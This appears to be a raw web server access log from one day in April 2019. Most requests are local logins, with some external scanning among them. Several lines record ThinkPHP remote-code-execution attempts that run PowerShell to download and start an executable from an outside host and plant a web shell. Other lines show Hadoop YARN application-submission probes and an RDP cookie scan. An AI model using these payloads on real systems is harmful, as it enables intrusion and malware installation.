127.0.0.1 - - [28/Apr/2019:00:32:34 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:02:16:52 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:02:16:55 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:02:45:04 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:04:27:41 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:04:27:41 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:04:27:41 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:04:27:42 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:05:48:08 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:05:48:08 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:05:48:08 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:05:48:09 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:06:54:46 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:06:54:46 -0400] "GET /login HTTP/1.1" 200 4162 185.209.0.12 - - [28/Apr/2019:08:01:16 -0400] "/*àCookie: mstshash=Administr " 400 - 198.108.66.208 - - [28/Apr/2019:08:28:13 -0400] "GET / HTTP/1.1" 302 - 38.39.192.14 - - [28/Apr/2019:10:07:31 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 165.22.70.111 - - [28/Apr/2019:10:24:40 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 127.0.0.1 - - [28/Apr/2019:11:42:18 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:11:42:18 -0400] "GET /login HTTP/1.1" 200 4162 38.39.192.14 - - [28/Apr/2019:13:33:26 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 27.115.124.70 - - [28/Apr/2019:13:51:54 -0400] "GET /server-status HTTP/1.1" 302 - 27.115.124.70 - - [28/Apr/2019:13:51:54 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:14:04:42 -0400] "GET / HTTP/1.1" 302 - 1.119.137.90 - - [28/Apr/2019:14:13:01 -0400] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/nbaoygwwfnpgowj15053.exe');start%20C:/Windows/temp/nbaoygwwfnpgowj15053.exe HTTP/1.1" 200 2137 1.119.137.90 - - [28/Apr/2019:14:13:02 -0400] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 200 2137 1.119.137.90 - - [28/Apr/2019:14:13:02 -0400] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/nbaoygwwfnpgowj15053.exe');start%20C:/Windows/temp/nbaoygwwfnpgowj15053.exe HTTP/1.1" 200 2137 127.0.0.1 - - [28/Apr/2019:14:14:44 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:14:14:45 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:14:34:56 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:14:34:57 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:14:34:58 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:14:34:58 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:14:34:59 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:14:35:00 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:14:35:02 -0400] "GET /forgotPasswordLink HTTP/1.1" 200 3711 38.39.192.14 - - [28/Apr/2019:15:18:04 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 127.0.0.1 - - [28/Apr/2019:16:36:09 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:16:36:10 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:16:36:14 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:16:54:38 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:16:54:42 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:18:22:12 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:18:22:12 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:18:22:12 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:18:22:13 -0400] "GET /login HTTP/1.1" 200 4162 38.39.192.14 - - [28/Apr/2019:18:39:42 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 127.0.0.1 - - [28/Apr/2019:18:53:59 -0400] "GET /wp-login.php HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:18:54:00 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:18:58:46 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:19:42:23 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:19:42:23 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [28/Apr/2019:19:42:23 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [28/Apr/2019:19:42:24 -0400] "GET /login HTTP/1.1" 200 4162 38.39.192.14 - - [28/Apr/2019:22:27:28 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 127.0.0.1 - - [28/Apr/2019:23:23:49 -0400] "GET / HTTP/1.1" 302 -